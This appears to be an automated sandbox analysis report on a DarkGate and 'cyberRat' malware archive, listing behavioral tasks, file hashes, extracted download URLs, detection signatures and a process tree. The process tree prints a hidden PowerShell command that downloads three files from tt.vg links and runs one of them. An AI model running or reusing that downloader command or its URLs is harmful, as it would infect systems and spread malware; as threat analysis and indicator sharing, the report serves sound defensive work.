Overview
overview
10Static
static
10apk/cyberR...ws.jar
windows7-x64
1apk/cyberR...ws.jar
windows10-2004-x64
1apk/cyberR...x.html
windows7-x64
3apk/cyberR...x.html
windows10-2004-x64
3apk/cyberR...x.html
windows7-x64
3apk/cyberR...x.html
windows10-2004-x64
1exe/crypte...te.bat
windows7-x64
10exe/crypte...te.bat
windows10-2004-x64
10exe/crypte...er.vbs
windows7-x64
10exe/crypte...er.vbs
windows10-2004-x64
10exe/crypte...-0.dll
windows7-x64
1exe/crypte...-0.dll
windows10-2004-x64
1exe/crypte...e3.exe
windows7-x64
3exe/crypte...e3.exe
windows10-2004-x64
3exe/crypte...-0.dll
windows7-x64
3exe/crypte...-0.dll
windows10-2004-x64
3exe/crypte...in.exe
windows7-x64
10exe/crypte...in.exe
windows10-2004-x64
10exe/crypte...e3.dll
windows7-x64
1exe/crypte...e3.dll
windows10-2004-x64
1libssp-0.dll
windows7-x64
3libssp-0.dll
windows10-2004-x64
3pidgin.exe
windows7-x64
10pidgin.exe
windows10-2004-x64
10sqlite3.dll
windows7-x64
1sqlite3.dll
windows10-2004-x64
1exe/non cr...x.html
windows7-x64
3exe/non cr...x.html
windows10-2004-x64
3exe/non cr...ed.exe
windows7-x64
10exe/non cr...ed.exe
windows10-2004-x64
10exe/non cr...x.html
windows7-x64
3exe/non cr...x.html
windows10-2004-x64
3Analysis
-
max time kernel
46s -
max time network
52s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
21-08-2024 20:17
Behavioral task
behavioral1
Sample
apk/cyberRat/Port 7262 sample build/Google News.jar
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
apk/cyberRat/Port 7262 sample build/Google News.jar
Resource
win10v2004-20240802-en
Behavioral task
behavioral3
Sample
apk/cyberRat/Port 7262 sample build/index.html
Resource
win7-20240704-en
Behavioral task
behavioral4
Sample
apk/cyberRat/Port 7262 sample build/index.html
Resource
win10v2004-20240802-en
Behavioral task
behavioral5
Sample
apk/cyberRat/index.html
Resource
win7-20240708-en
Behavioral task
behavioral6
Sample
apk/cyberRat/index.html
Resource
win10v2004-20240802-en
Behavioral task
behavioral7
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
Resource
win7-20240704-en
Behavioral task
behavioral8
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
Resource
win10v2004-20240802-en
Behavioral task
behavioral9
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs
Resource
win7-20240729-en
Behavioral task
behavioral10
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/launcher.vbs
Resource
win10v2004-20240802-en
Behavioral task
behavioral11
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll
Resource
win7-20240704-en
Behavioral task
behavioral12
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/libssp-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral13
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe
Resource
win7-20240708-en
Behavioral task
behavioral14
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/Crypted_with AU3 with startup only with decoded Launcher VBS/sqlite3.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral15
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll
Resource
win7-20240705-en
Behavioral task
behavioral16
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/libssp-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral17
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe
Resource
win7-20240704-en
Behavioral task
behavioral18
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/pidgin.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral19
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll
Resource
win7-20240704-en
Behavioral task
behavioral20
Sample
exe/crypted/Dakrgate 5864 startup plus rootkit/protected_AU3_cGig/sqlite3.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral21
Sample
libssp-0.dll
Resource
win7-20240729-en
Behavioral task
behavioral22
Sample
libssp-0.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral23
Sample
pidgin.exe
Resource
win7-20240708-en
Behavioral task
behavioral24
Sample
pidgin.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral25
Sample
sqlite3.dll
Resource
win7-20240705-en
Behavioral task
behavioral26
Sample
sqlite3.dll
Resource
win10v2004-20240802-en
Behavioral task
behavioral27
Sample
exe/non crypted/Darkgate 5864 port sample not startup/index.html
Resource
win7-20240704-en
Behavioral task
behavioral28
Sample
exe/non crypted/Darkgate 5864 port sample not startup/index.html
Resource
win10v2004-20240802-en
Behavioral task
behavioral29
Sample
exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe
Resource
win7-20240708-en
Behavioral task
behavioral30
Sample
exe/non crypted/Darkgate 5864 port sample not startup/stubbed.exe
Resource
win10v2004-20240802-en
Behavioral task
behavioral31
Sample
exe/non crypted/index.html
Resource
win7-20240704-en
Behavioral task
behavioral32
Sample
exe/non crypted/index.html
Resource
win10v2004-20240802-en
General
-
Target
exe/crypted/Dakrgate 5864 startup plus rootkit/Batch file for 5864v dll crypted darkgate/update.bat
-
Size
6KB
-
MD5
97b7c88a02b2a5214d742b7ed50f4544
-
SHA1
15bf7dd44049b94db1a82504802ead45f6186fa0
-
SHA256
20c3a5b1c87627e9e016494b806273230f5023cf12d2c0e29eceecb7b8a6d3b6
-
SHA512
918c856e61d8b348a705227ec381a8101481ec3aaa4a1f6545b9706ebf491d311cfe716f62ab04c796333bae5df857fc67cac86760be1c67578ca1031a906b25
-
SSDEEP
192:GqNFRmxkyzz06ETWtd4pTunJ8ccJkBhKhgQ:Vp2kgzSTWsu6hJEhKht
Malware Config
Extracted
https://tt.vg/download-update-dll1
https://tt.vg/dlldownload2sqliuit-download
https://tt.vg/download-latest-update
Signatures
-
Blocklisted process makes network request 7 IoCs
flow pid Process 5 2828 powershell.exe 7 2828 powershell.exe 8 2828 powershell.exe 9 2828 powershell.exe 10 2828 powershell.exe 11 2828 powershell.exe 12 2828 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2828 powershell.exe 2636 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 4 tt.vg 5 tt.vg -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2828 powershell.exe 2636 powershell.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 2828 powershell.exe Token: SeDebugPrivilege 2636 powershell.exe Token: 33 2820 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2820 AUDIODG.EXE Token: 33 2820 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 2820 AUDIODG.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 560 wrote to memory of 2828 560 cmd.exe 30 PID 560 wrote to memory of 2828 560 cmd.exe 30 PID 560 wrote to memory of 2828 560 cmd.exe 30 PID 560 wrote to memory of 2636 560 cmd.exe 33 PID 560 wrote to memory of 2636 560 cmd.exe 33 PID 560 wrote to memory of 2636 560 cmd.exe 33
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\exe\crypted\Dakrgate 5864 startup plus rootkit\Batch file for 5864v dll crypted darkgate\update.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {$wc = New-Object System.Net.WebClient; $wc.DownloadFile('https://tt.vg/download-update-dll1', 'C:\Users\Admin\AppData\Local\Temp\libssp-0.dll'); $wc.DownloadFile('https://tt.vg/dlldownload2sqliuit-download', 'C:\Users\Admin\AppData\Local\Temp\sqlite3.dll'); $wc.DownloadFile('https://tt.vg/download-latest-update', 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe')}"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2828
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -WindowStyle Hidden -Command "& {Start-Process 'C:\Users\Admin\AppData\Local\Temp\pidgin.exe' -WindowStyle Hidden}"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2636
-
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe"1⤵PID:2640
-
C:\Windows\system32\AUDIODG.EXEC:\Windows\system32\AUDIODG.EXE 0x4401⤵
- Suspicious use of AdjustPrivilegeToken
PID:2820
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD51324193511cba097f81cdf83afc01e31
SHA1e0cc68ed16dee7917095ed626fd60f0da58005e5
SHA256ae1c754e388a05c11806f230f3d99dc4c9bcc1d37f86eb2d3178a281df998ad1
SHA51261c3cca822377000a7f39281ae16688df1c9b6753a6ed0a9cc662255d23ee60844bbe361bd78a846d472a4b218b22f103fd2b33692f388db3912df3eab728b7d